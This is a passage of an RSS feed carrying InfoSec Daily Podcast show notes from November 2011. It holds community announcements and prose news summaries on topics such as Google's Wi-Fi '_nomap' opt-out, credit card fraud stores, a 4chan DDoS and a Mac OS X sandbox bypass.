	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infected Facebook users are faced with the unpleasant task of deactivating their accounts to avoid sending the shocking images to family and friends.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.cio.com/article/694077/Google_Offers_Opt_Out_for_Wi_Fi_Location_Database"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/694077/Google_Offers_Opt_Out_for_Wi_Fi_Location_Database</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google now offers a way for anyone to get out and stay out of its Wi-Fi location database, the company</span><a href="http://googleblog.blogspot.com/2011/11/greater-choice-for-wireless-access.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">announced</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Following last year&#39;s Wi-Fi snooping scandal, Google is looking to make amends by allowing anyone to opt out from having their wireless access point included in the Google Location Server.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To refresh your memory, Google collects basic Wi-Fi data from network routers including Service Set Identifier (SSID) information and Media Access Control (MAC) addresses. This information is used to help the company improve the accuracy of some of its location-based products, such as Google Maps, by matching publicly broadcast information about local wireless networks with their approximate geographic location.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google says it has explored different approaches for opting-out access points from its Location Server and thinks it found a method that has &quot;the right balance of simplicity as well as protection against abuse.&quot; The method involves modifying your wireless network name so that it ends with &quot;_nomap&quot;. So for example, if your SSID is &quot;My Network&quot;, you will need to change it to &quot;My Network_nomap&quot;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once you&#39;ve changed your network name, next time a user&#39;s device sends information about your Wi-Fi access point to the Location Server, Google will note the &quot;_nomap&quot; tag and remove the access point from its records. If you need more help with changing your Wi-Fi network name, Google has this useful</span><a href="http://maps.google.com/support/bin/answer.py?hl=en&amp;answer=1725632"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">help article</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3134/0/infosec-daily-podcast-episode-523.mp3" length="19448203" type="audio/mpeg" />
		<itunes:duration>0:40:28</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.
	Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.
	Announcements:
	Caption Contest. Gives us your best and worst caption or PhotoShopped version:
	&#160;

	
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: &#160;https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4
	QUOTE: [Craig S Wright ] says: I was contracted to test the systems on a Boeing 747. They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 &#8211; VLANs. We managed to break the VLANs and access other systems and with source routing could access the Engine management systems.
	The response, &#34;the engine management system is out of scope.&#34;
	For those who do not know, 747&#39;s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.
	The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is&#8230; I need not say more.
	Source: &#160;http://technology.canoe.ca/2011/11/15/18971056.html
	Hackers attacking Canadian organizations are determined to make money in targeted campaigns while government insiders stole more data than ever before, a security study released on Tuesday showed.&#160;&#160;&#160; 
	The number of breaches in Canada and the cost of dealing with them have spiked since the 2008 financial crisis, according to a joint study from telecom company Telus and the University of Toronto&#39;s Rotman School of Management.&#160;&#160;&#160; 
	The study, its fourth annual report, said the crisis had both pressured budgets for information security and created a darker &#34;threat environment.&#34;&#160;&#160;&#160; 
	The average Canadian public company suffered 18 breaches in 2011, up from less than 12 breaches a year earlier, the study found. Government bodies were able to reverse the trend of increasing breaches; there were just over 17 this year after a spike above 22 last year.&#160;&#160;&#160; 
	But insider breaches, where an employee deliberately acces[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 522 &#8211; CC Underground, Drive Shortage, 4Chan, OS X Sandbox &amp; sweepstakesandcontestsinfo</title>
		<link>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo</link>
		<comments>http://www.isdpodcast.com/episode-522-cc-underground-drive-shortage-4chan-os-x-sandbox-sweepstakesandcontestsinfo#comments</comments>
		<pubDate>Tue, 15 Nov 2011 02:13:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3130</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 522 for November 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan Announcements: Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160;http://pic.twitter.com/SovbFcbE Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 522 for November 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Caption Contest. Gives us your best and worst caption or PhotoShopped version: &nbsp;</span><a href="http://t.co/SovbFcbE"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pic.twitter.com/SovbFcbE</span></a><img height="608px;" src="https://lh3.googleusercontent.com/XgYONfWjc6WmRuaN_1Sc_z6NbUvWH4ecuml-VuF-zQrM9PHughc840YbzzFI1Ow9VVjRgvUG0PZtdaQR8DY9LWWfjrkF3cEf0pjCih4v8d9hMl9-oNo" width="456px;" /></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.rsa.com/aharoni/underground-forums-open-official-credit-card-stores</span></a></p>
<p><a href="http://blogs.rsa.com/aharoni/automated-credit-card-stores-and-the-business-of-trading-in-the-fraud-underground/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Automated CC stores</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> websites offer fraudsters an automatic way of buying stolen credit cards &ndash; simply fund an account with e-currency, choose which type of card you would like, pay and receive the full credential. Their popularity has reached such a fever pitch,</span><a href="http://blogs.rsa.com/aharoni/automated-credit-card-stores-and-the-business-of-trading-in-the-fraud-underground/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">CC store kits</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> are traded in the underground in the same fashion as phishing kits. Very few respectful vendors are without one. In a recent post on his blog, Dancho Danchev</span><a href="http://ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">exposed some of the stores</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, providing a glimpse into this booming market. Recently, we&rsquo;ve encountered a new development in the underground in regards to these sites &ndash; forums opening &ldquo;official&rdquo; stores.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the old days when a fraudster was interested in selling credit cards, he had to join a forum and be formally inducted by other forum members who would vouch for him. This process required him to send a few sample cards to the forum&rsquo;s moderators, who tested the cards and wrote a review. If the fraudster passed the review, he&rsquo;d get a &ldquo;verified vendor&rdquo; status &ndash; a stamp of approval by the forum that the vendor is indeed legit. This process was put into place mainly because of the high volume of forum members that used to rip off other fraudsters, &ldquo;</span><a href="http://blogs.rsa.com/aharoni/the-fraud-underground-is-still-a-gold-mine-despite-trust-issues/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">rippers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&rdquo; in fraudster terminology. However, when the CC store fad started, vendors moved their business out of the walled garden of the forum. While this protected the vendors from any rippers masquerading as buyers (as everything is automatic and there&rsquo;s no way a ripper can beg for free samples), it didn&rsquo;t protect the buyers. Picking up on the trend, &ldquo;rippers&rdquo; started building their own stores &ndash; fake ones &ndash; that required an initial fee to get into them. Once this fee is paid, the ruse was exposed and the ripped off buyer realized that the store never existed.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/computer-hardware/hard-drive-shortages-will-result-in-more-expensive-pcs-says-gartner-178913</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enterprise users and consumers who have held off buying new PCs recently may come to regret their decision as a hard-drive shortage following floods in Thailand is expected to result in higher prices, according to Gartner.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The market research company on Monday presented its survey of third-quarter PC sales in western Europe, reporting that PC shipments totaled 14.8 million units in the third quarter, an 11.4 percent decline from the same period last year.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like elsewhere in the world, the enterprise market in western Europe is doing a bit better than the consumer market, where sales declined by almost 19 percent. However, small and mid-size companies were very reluctant when it came to upgrading their PCs, while large enterprises are doing piecemeal upgrades instead of changing all machines at once, according to Meike Escherich, principal analyst at Gartner.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While holding off upgrades may have seemed like a prudent move, in light of the current economic situation, floods in Thailand can change that. They will have a major affect on the availability of hard drives; about 50 million fewer drives will be manufactured during the fourth quarter, according to Escherich. That will result in shortages in 2012, and higher prices.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Vendors won&#39;t be able to absorb higher drive costs and will have to raise PC prices,&quot; said Escherich.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Desktops as well as low-end servers will be affected first and laptops will then follow suit.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Smaller, regional PC makers will bear the brunt of the shortages and will struggle to survive during the first half of next year, as larger vendors get preferential treatment, according to Escherich.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.thinq.co.uk/2011/11/14/4chan-hit-ddos"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/14/4chan-hit-ddos</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imageboard 4Chan has been down by a Distributed Denial of Service (DDoS) attack &#8211; and some fingers are pointing at the hacking group Lulzsec. The Anons, it seems, are getting a taste of their own medicine. &nbsp;The announcement came from the official</span><a href="http://twitter.com/#%21/4chan"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">4Chan twitter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, with it also pointing users towards the</span><a href="http://status.4chan.org/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">status page</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to provide updates on the attack.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A number of posts on the site allege that hacking group Lulzsec is responsible, but there&#39;s nothing to back that up on of the group&#39;s Twitter accounts or related news sites.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IT news site</span><a href="http://techcrunch.com/2010/11/14/tumblr-4chan-war/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">TechCrunch</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> speculates that perhaps Tumblr users are responsible for the DDoSing, and reproduces a number of the image-based posts the sites are well known for, instructing users to target the opposing imageboard.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This DDoS occured just one day before anintended 4Chan attack on Tumblr, so a pre-emptive strike would make some sort of sense. Though in the world of intra-site DDoS wars there isn&#39;t a lof of that to be found.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As yet, 4Chan-spawned &#39;hacktivist&#39; collective Anonymous doesn&#39;t appear to have offered any comment &#8211; so for now, everything is speculation. &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">4Chan is now accessible, but it&#39;s incredibly slow. It seems that the DDoS is continuing. &nbsp;</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/security/researchers-bypass-the-restrictions-mac-os-x-default-sandbox-profiles-178914"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/security/researchers-bypass-the-restrictions-mac-os-x-default-sandbox-profiles-178914</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The restrictions imposed by Mac OS X generic application sandbox profiles can be easily bypassed, researchers from Core Security Technologies found.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple does not believe this poses a security problem, but is considering a documentation change to better communicate limitations of the sandbox profiles, the security experts said.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mac OS X App Sandbox allows developers to restrict what their applications can do and access on a system. This is an important proactive security mechanism, because if an attacker manages to take control over a &quot;sandboxed&quot; application, through a vulnerability or otherwise, their actions would be restricted by that app&#39;s permissions.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To help developers implement this security feature more easily in their apps, Apple has provided a few default sandbox profiles. One of them is called &quot;kSBXProfileNoNetwork&quot; and as the name implies, it restricts an application&#39;s access to the local network. Another one, called &quot;kSBXProfileNoInternet,&quot; can be used to restrict access to the Internet.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers from Core Security Technologies discovered that these default profiles allow Apple-script events to be sent to other applications. They created a proof-of-concept exploit that leverages this to call &quot;osascript,&quot; a scripting language interpreter built into Mac OS X, in order to spawn a separate, non-sandboxed, process.</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In practical terms, if an attacker gains access over an application running under the kSBXProfileNoInternet sandbox profile, he could use osascript to launch a separate process that does have access to the Internet, therefore bypassing the restriction.</span></p>
